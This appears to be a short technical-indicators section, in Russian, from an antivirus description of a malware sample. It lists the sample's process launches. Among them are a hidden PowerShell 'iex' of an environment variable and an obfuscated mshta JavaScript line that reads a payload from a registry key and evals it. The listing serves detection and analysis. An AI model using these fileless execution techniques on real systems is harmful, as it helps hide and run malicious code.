Техническая информация
- %WINDIR%\syswow64\regsvr32.exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:eybdyf' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' javascript:BpO7R9Wp="Kwrbu1";IT12=new%20ActiveXObject("WScript.Shell");bJ9Qaa9G="HHelxr";i39QAS=IT12.RegRead("HKLM\\software\\Wow6432Node\\VPPIAQXxq\\Lbn73quf");j9JaWYc="G0lJVCm";eval(i39QAS);T...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:eybdyf
- '%WINDIR%\syswow64\regsvr32.exe'